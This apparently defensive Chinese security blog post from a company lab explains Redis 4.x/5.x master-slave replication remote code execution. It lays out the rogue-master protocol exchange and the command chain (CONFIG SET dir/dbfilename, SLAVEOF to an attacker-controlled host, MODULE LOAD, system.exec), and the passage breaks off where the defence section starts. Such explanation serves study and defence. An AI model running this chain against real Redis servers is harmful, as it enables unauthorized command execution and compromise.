古语有云：“学如逆水行舟，不进则退。”面对如今随时都在变化的网络安全环境更是如此。为此，创信华通微信公众号特开设“创安实验室专栏”，以记录创信华通创安实验室在技术上的探索，加强同行间的交流，相互学习，共同进步。

✦+

Redis是一套开源的使用ANSIC编写、支持网络、可基于内存亦可持久化的日志型、键值存储数据库，并提供多种语言的API。由于其高可用性和速度优势，常用于缓存系统（“热点”数据：高频读、低频写）、计数器、消息队列系统、排行榜、社交网络和实时系统等。

Redis主从复制RCE是在主从复制基础上，通过复制恶意文件到本地，结合模块加载功能将恶意文件成功加载，调用恶意文件接口实现命令执行。

Redis 4.x 和Redis 5.x版本

Redis 2.8版本在原有单机架构的基础上，为了解决单机宕机的风险，引入主从复制的机制，通过主服务器将数据备份到从服务器上，由主服务器负责处理外部写操作，从服务器负责读操作。通过数据复制，Redis的一个master可以挂载多个slave，而slave下还可以挂载多个slave，形成多层嵌套结构。所有写操作都在master实例中进行，master执行完毕后，将写指令分发给挂在自己下面的slave节点。slave节点下如果有嵌套的slave，会将收到的写指令进一步分发给挂在自己下面的slave。

Redis提供了2种不同的持久化方式，RDB方式（在指定的时间间隔内生成数据集的时间点快照）和AOF方式（记录服务器执行的所有写操作命令）.AOF方式备份数据库的文件名默认为appendonly.aof，可以在配置文件中通过修改appendfilename参数进行修改，无法在客户端交互中动态设置appendfilename，而RDB方式备份数据库的文件名默认为dump.rdb，此文件名可以通过客户端交互动态设置dbfilename来更改。

主从复制模式下数据单向从主节点流向从节点，在从节点首次注册时，会对主节点数据进行全量复制，复制过程中用offset记录读取的数据大小，以便中断后断点续传。如果从节点初始没有数据，通过主从复制，可以将主节点设置的dbfilename文件全量复制到从节点的dbfilename中，从而实现任意文件上传。

任意Redis服务器在启动时默认作为Master主节点，当执行SLAVEOF命令后自动发送请求注册成为目标的从节点，未对主节点信息进行校验。

在Reids 4.x之后，Redis新增了模块功能，通过写c语言并编译出.so文件作为外部拓展，可以实现在redis中实现一个新的Redis命令。

因此，可以通过自己模拟Redis服务器，通过执行命令设置将其设置为主节点，通过自行构造主服务器响应的情况，通过FULLRESYNC命令无损写入想要写的文件。结合任意模块加载，实现任意命令执行。

主服务器需要执行的响应内容如下:

[>] PING – 从服务器探测主服务器是否存活

[<] +PONG  存活响应

[>] REPLCONF – 交换主从节点复制信息

[<] +OK     确认

[>] PSYNC/SYNC – 同步状态以及传输方式

[<] +FULLRESYNC  同步数据

Config set dir /path/

Config set dbfilename test.so  修改备份文件路径

SLAVEOF host port 设置为对应服务器的从节点

MODULE LOAD /path/test.so 加载复制过来的

SLAVEOF no one  关闭主从复制关系(防止脏数据复制)

System.exec ‘command’ 执行命令

对应流量特征如下：

主从复制RCE实现条件:

□ Redis可访问（未授权或有凭据）

□ 可动态修改备份文件路径

□ 主从未校验可信服务端

依据上述情况,可以对应防护: